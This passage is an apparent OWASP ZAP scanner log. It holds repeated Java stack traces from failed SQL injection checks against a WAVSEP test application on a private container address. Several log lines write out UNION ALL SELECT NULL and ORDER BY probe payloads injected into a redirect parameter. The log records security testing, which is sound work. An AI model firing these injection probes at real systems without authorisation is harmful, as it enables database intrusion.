org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681465 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681465 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681467 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681467 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681468 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681469 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681470 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681470 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681472 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681472 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 4770-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt ORDER BY 4770-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681473 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681473 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681474 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http:// UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at 